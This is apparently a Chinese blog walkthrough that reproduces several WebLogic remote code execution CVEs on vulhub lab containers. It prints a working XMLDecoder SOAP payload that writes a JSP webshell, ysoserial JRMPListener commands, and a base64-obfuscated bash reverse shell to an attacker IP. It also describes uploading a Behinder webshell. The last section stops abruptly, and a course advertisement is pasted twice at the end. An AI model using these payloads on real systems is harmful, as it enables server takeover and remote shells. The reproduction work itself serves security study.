CVE-2020-14882——CVE-2020-14883
######这里后续会补充ssrf和weak_password的漏洞复现
简介
Oracle WebLogic Server 是一个统一的可扩展平台,专用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。它提供了一种强健、成熟和可扩展的 Java Enterprise Edition (EE) 和 Jakarta EE 实施方式。
需要使用的工具
ysoserial使用不同库制作的放序列化工具:
GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
weblogic集成的图形化攻击工具:https://github.com/KimJun1010/WeblogicTool
JNDIMap 是一个 JNDI 注入利用工具, 支持 RMI 和 LDAP 协议, 包含多种高版本 JDK 绕过方式
X1r0z/JNDIMap: JNDI 注入利用工具, 支持 RMI 和 LDAP 协议, 包含多种高版本 JDK 绕过方式 (github.com)")
CVE-2017-10271
XXE漏洞
0x00 漏洞产生原因
CVE-2017-10271的漏洞产生原因简单来说就是weblogic的WLS Security组件对外提供的webserver服务调用了XMLDecode去解析了用户传入的XML数据,在解析过程中出现了反序列化漏洞,导致了攻击者可以通过精心构建的漏洞来达到任意命令执行
0x01 影响范围
10.3.6.0 12.1.3.0.0 12.2.1.1.0
0x02 漏洞地址
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
这里我将这些地址添加进dirsearch的字典了,原版只有wls-wsat/CoordinatorPortType路径,
###每一次遇到一些漏洞的地址都可以添加进去
默认使用字典地址/usr/lib/python3/dist-packages/dirsearch/db/dicc.txt
!!!!注意我这里时使用的apt安装的dirsearch
0x03 环境
docker-compose搭建的vulhub靶场CVE-2017-10271
0x04 漏洞复现
1. 手工
poc
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
<void method="println">
<string>
<![CDATA[
<% out.print("webshell"); %>
]]>
</string>
</void>
<void method="close"/>
</object></java></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
访问存在漏洞的页面
使用hackbar随意传入一个post参数
将poc传入执行
只需要修改content-type为text/xml即可
访问可知成功写入,后续可通过此poc写入jsp马子
2. 漏洞利用工具
直接放入存在漏洞的url然后选择使用CVE_2017_10271漏洞,直接就可利用
CVE-2018-2628
反序列化漏洞
0x00 漏洞产生原因
该漏洞是因为T3协议而触发的反序列化漏洞,造成的任意命令执行漏洞,导致未授权用户远程命令执行
0x01 影响范围
10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3
0x02 环境
docker搭建的vulhub靶场
靶场地址:172.28.10.221:7001
0x03 漏洞复现
1.nmap扫是否是T3协议
一般T3协议是默认开启的,但也需要扫一下看是否存在,说不定开发人员给关了
nmap -T4 -sV -O -p 7001 --script weblogic-t3-info 127.0.0.1
-T4 设置扫描速度(1-6) -sV 对端口的服务进行扫描
-O 服务器系统扫描 -p 指定扫描端口
–script 指定文件脚本
需要使用weblogic-t3-info模块指定去扫是否有T3协议**####只针对没打补丁的情况下的检测**
(这里我在本地搭建的所以使用的是127.0.0.1)
也可使用集成的工具直接扫
2.漏洞检测(利用dnslog外带)
这里使用的是bp自带的工具
3.漏洞复现
攻击流程
被攻击机——》攻击机(jrmp服务)——》回到被攻击机执行命令——》攻击机接收到shell
在攻击机上执行一下命令
java -cp ./ysoserial.jar ysoserial.exploit.JRMPListener+<监听端口>+<java1.7以上则填Jdk7u21>+<要执行的命令>
java -cp ./ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections3 ‘calc’
攻击机监听端口
尝试将反弹shell到攻击机
将bash命令加密一下
Runtime.exec Payload Generater | AresX’s Blog (ares-x.com)")
开启服务
./java -cp ./ysoserial.jar ysoserial.exploit.JRMPListener 9999 Jdk7u21 ‘bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjgwLzEyMzQ1IDA+JjE=}|{base64,-d}|{bash,-i}’
这里注意java需要使用jre版本的,并且需要下载ysoserial放在java的bin目录里(也可放在其他地方使用绝对路径调用)
使用工具通过漏洞让被攻击机访问攻击机开启的服务
收到访问流量
成功拿到shell
CVE-2018-2894
任意文件上传漏洞
0x00 漏洞产生原因
weblogic未授权的两个页面存在任意文件上传
Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制
0x01 影响范围
10.3.6.0 12.1.3.0 12.2.1.2 12.2.1.3
0x02 环境
weblogic服务器ip:172.28.10.221
还是使用docker搭建环境
0x03 复现信息
- 漏洞存在的页面:/ws_utc/begin.do、/ws_utc/config.do
- 登录账户密码使用命令查看docker-compose logs | grep password
0x04 漏洞复现
访问漏洞存在的页面
使用获取的账户密码登录(真实环境肯定是需要其他方法进入的,比如弱口令、未授权访问这些)
访问console目录自动跳转登录
启动web测试服务页
然后访问/ws_utc/config.do
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
这里把工作目录换为以上路径
bp抓包得到时间戳
因为他的命名方式为时间戳_名字.jsp
上传成功后访问此路径
/ws_utc/css/config/keystore/文件
能访问到就算成功
我这里使用的是冰蝎自带的马子
密码默认的
rebeyond
拿到webshell
CVE-2020-14882——CVE-2020-14883
管理控制台未授权远程命令执行漏洞
0x00 漏洞产生原因
CVE-2020-14882这个漏洞会造成未授权访问,而CVE-2020-14883允许后台用户通过http协议执行任意命令,这两个漏洞联合起来组成的利用链就可以达到任意命令执行的效果
0x01 影响范围
10.3.6.0.0 12.1.3.0.0 12.2.1.3.0 12.2.1.4.0 14.1.1.0.0
0x02 环境
weblogic服务ip:172.28.10.21
依旧是docker搭建
0x03 漏洞复现
正常访问登录页面会回显让登录
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
[外链图片转存中…(img-6nwVvke3-1715544744778)]
[外链图片转存中…(img-NDGyc6kg-1715544744778)]
[外链图片转存中…(img-XvXkYiWO-1715544744779)]
[外链图片转存中…(img-32SjPGok-1715544744779)]
[外链图片转存中…(img-3OWL5X6U-1715544744779)]
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!